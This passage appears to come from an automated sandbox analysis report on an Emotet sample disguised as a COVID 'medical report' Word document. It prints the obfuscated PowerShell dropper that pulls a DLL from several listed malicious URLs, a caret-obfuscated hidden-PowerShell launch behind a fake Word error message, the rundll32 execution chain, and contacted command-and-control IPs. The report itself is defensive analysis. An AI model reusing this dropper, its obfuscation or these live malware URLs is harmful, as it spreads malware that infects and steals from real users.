Source: C:\Windows\System32\cmd.exe Process created: Base64 decoded Sv PB5o ([TYpE]("{2}{1}{5}{3}{0}{6}{4}" -F 'T','EM.I','SYsT','eC','y','o.DIR','OR') ) ; SEt-ITEm vARIaBLe:m7a9 ([typE]("{4}{2}{3}{5}{1}{6}{0}{7}" -f'n','ICEpOINtm','neT','.','sySteM.','sERv','A','aGer') ) ; $Ihv89_g=$M91G + [char](33) + $H23D;$D94M=(('P7'+'2')+'X'); (gET-variaBle pb5o -VA)::"crEaTedi`ReCt`oRY"($HOME + ((('9k'+'tNk')+'2'+'d'+('uhb9'+'kt'+'Gxlh')+('9i'+'a9kt'))."rE`PlaCe"(('9'+'kt'),'\')));$J87H=('S'+('36'+'N')); ( vaRIable M7a9 -VA )::"SEcuriTYp`RoToC`oL" = (('Tl'+'s')+'12');$X22U=('E'+('_'+'_E'));$P27pqe3 = ('E6'+'_R');$F39L=(('Q'+'94')+'W');$Ad1ra8n=$HOME+((('Ki'+'m')+('Nk2d'+'uhb')+'Ki'+'m'+('Gx'+'l')+'h9'+('i'+'aKi')+'m')-RePlace([CHAR]75+[CHAR]105+[CHAR]109),[CHAR]92)+$P27pqe3+'.d' + 'll';$V28U=('C8'+'8K');$Mriqd59='h' + 'tt' + 'p';$Kw3794x=('x '+'['+(' sh'+' ')+('b'+'://cab.my'+'kf')+'n.'+('com'+'/')+'a'+('d'+'min')+'/'+('X/'+'!')+'x'+(' '+'[ s')+'h'+(' b'+':')+('/'+'/bha')+'k'+'ti'+('vrind'+'.'+'com/c')+'g'+('i'+'-bin')+('/'+'JBbb'+'8'+'/!x [ ')+'sh'+(' b'+':')+('/'+'/van'+'ddna')+('bharg'+'a')+'ve'+('.c'+'o')+('m/ass'+'et')+'/W'+('9o'+'/')+'!'+'x '+'[ '+('s'+'h ')+('b:'+'/')+('/ie-'+'b'+'e')+('s'+'t.n')+'e'+('t/o'+'n'+'lin')+'e'+('-'+'timer'+'-')+('k'+'vh')+('xz'+'/i')+'l'+('X'+'L/!x')+(' [ s'+'h ')+('b:'+'/')+'/'+'g'+('oc'+'p'+'hon')+('gth'+'e')+('.com/'+'wp'+'-')+'co'+'nt'+('ent/'+'l')+'M'+('MC'+'/!')+('x '+'[ s')+('h'+' b://'+'ww')+'w'+('.l'+'e')+('t'+'sc')+'om'+'pa'+('r'+'eon')+('l'+'in')+('e'+'.c')+('om/d'+'e')+('.l'+'et')+'sc'+'
Creates a process in suspended mode (likely to inject code)
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\msg.exe msg user /v Word experienced an error trying to open the file.
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -w hidden -enc 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
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\rundll32.exe 'C:\Windows\system32\rundll32.exe' C:\Users\user\Nk2duhb\Gxlh9ia\E6_R.dll AnyString
Source: C:\Windows\System32\rundll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\system32\rundll32.exe' C:\Users\user\Nk2duhb\Gxlh9ia\E6_R.dll AnyString
Source: C:\Windows\SysWOW64\rundll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Users\user\Nk2duhb\Gxlh9ia\E6_R.dll',#1
Source: C:\Windows\SysWOW64\rundll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Dgmlr\ngcj.eda',hyhQYxhuLCMLb
Source: C:\Windows\SysWOW64\rundll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Dgmlr\ngcj.eda',#1
Source: C:\Windows\SysWOW64\rundll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Zfrhfthwazxcccc\whpjzcoocbdvfd.agu',nCbdzah
Source: C:\Windows\SysWOW64\rundll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Zfrhfthwazxcccc\whpjzcoocbdvfd.agu',#1
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Source: unknown Process created: C:\Windows\System32\cmd.exe cmd cmd /c m^s^g %username% /v Wo^rd exp^erien^ced an er^ror tryi^ng to op^en th^e fi^le. & p^owe^rs^he^ll^ -w hi^dd^en -^e^nc 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
Source: unknown Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -w hidden -enc
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -w hidden -enc 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

Language, Device and Operating System Detection:

Queries the volume information (name, serial number etc) of a device
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\powershell_ise.exe VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\hh.exe VolumeInformation
Source: C:\Windows\SysWOW64\rundll32.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\rundll32.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Stealing of Sensitive Information:

Yara detected Emotet
Source: Yara match File source: 00000008.00000002.2121216068.0000000000290000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000007.00000002.2110577655.0000000000230000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000000A.00000002.2145222435.00000000001A0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000000C.00000002.2334223344.0000000000160000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000008.00000002.2121359913.0000000000700000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000008.00000002.2122851678.0000000010000000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000000A.00000002.2145232978.00000000001C0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000000B.00000002.2155705121.00000000001D0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000000C.00000002.2335867328.0000000010000000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000007.00000002.2110590102.0000000000250000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000000B.00000002.2155718494.0000000000200000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000009.00000002.2131220245.0000000000150000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000009.00000002.2131240758.0000000000170000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000000C.00000002.2334238430.0000000000180000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000000A.00000002.2149683472.0000000010000000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000009.00000002.2133987769.0000000010000000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000007.00000002.2111395088.0000000010000000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000000B.00000002.2156224518.0000000010000000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 11.2.rundll32.exe.1d0000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 9.2.rundll32.exe.10000000.8.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 9.2.rundll32.exe.150000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 8.2.rundll32.exe.290000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 12.2.rundll32.exe.10000000.11.unpack, type: UNPACKEDPE
Source: Yara match File source: 10.2.rundll32.exe.1c0000.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 11.2.rundll32.exe.200000.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 7.2.rundll32.exe.10000000.8.unpack, type: UNPACKEDPE
Source: Yara match File source: 12.2.rundll32.exe.180000.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 9.2.rundll32.exe.10000000.8.unpack, type: UNPACKEDPE
Source: Yara match File source: 10.2.rundll32.exe.1c0000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 11.2.rundll32.exe.10000000.8.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 7.2.rundll32.exe.250000.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 7.2.rundll32.exe.10000000.8.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 7.2.rundll32.exe.230000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 8.2.rundll32.exe.290000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 7.2.rundll32.exe.230000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 8.2.rundll32.exe.10000000.12.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 10.2.rundll32.exe.10000000.12.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 10.2.rundll32.exe.1a0000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 9.2.rundll32.exe.170000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 12.2.rundll32.exe.10000000.11.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 11.2.rundll32.exe.10000000.8.unpack, type: UNPACKEDPE
Source: Yara match File source: 8.2.rundll32.exe.700000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 9.2.rundll32.exe.150000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 12.2.rundll32.exe.180000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 11.2.rundll32.exe.200000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 11.2.rundll32.exe.1d0000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 12.2.rundll32.exe.160000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 9.2.rundll32.exe.170000.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 10.2.rundll32.exe.1a0000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 7.2.rundll32.exe.250000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 8.2.rundll32.exe.700000.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 10.2.rundll32.exe.10000000.12.unpack, type: UNPACKEDPE
Source: Yara match File source: 8.2.rundll32.exe.10000000.12.unpack, type: UNPACKEDPE
Source: Yara match File source: 12.2.rundll32.exe.160000.0.unpack, type: UNPACKEDPE
Behavior Graph ID: 354471, Sample: IU-8549 Medical report COVI..., Startdate: 17/02/2021, Architecture: WINDOWS, Score: 100. Process chain shown in the graph: WINWORD.EXE and cmd.exe start; cmd.exe launches msg.exe and powershell.exe (Suspicious powershell command line found, Very long command line found, Encrypted powershell cmdline option found); powershell.exe contacts ie-best.net (192.185.52.115, port 80) and vanddnabhargave.com (166.62.10.32, port 80) plus 2 other IPs or domains, drops a PE32 DLL (Powershell drops PE file) and starts rundll32.exe; that process spawns a chain of further rundll32.exe processes (Hides that the sample has been downloaded from the Internet (zone.identifier)), the last of which connects to 162.241.204.233 (port 8080), 69.38.130.14 (port 80) and 2 other IPs or domains (System process connects to network (likely due to code injection or exploit)). Top-level network nodes: 197.211.245.21 ZOL-ASGB Mauritius, 217.20.166.178 WNETUS Ukraine, and 91 other IPs or domains.

Contacted Public IPs


Contacted Domains

Name                  IP              Active
vanddnabhargave.com   166.62.10.32    true
ie-best.net           192.185.52.115  true
bhaktivrind.com       166.62.28.130   true
cab.mykfn.com         unknown         unknown

Contacted URLs

Name                                          Malicious  Antivirus Detection       Reputation
http://ie-best.net/online-timer-kvhxz/ilXL/   true       Avira URL Cloud: malware  unknown
http://bhaktivrind.com/cgi-bin/JBbb8/         true       Avira URL Cloud: malware  unknown
http://vanddnabhargave.com/asset/W9o/         true       Avira URL Cloud: malware  unknown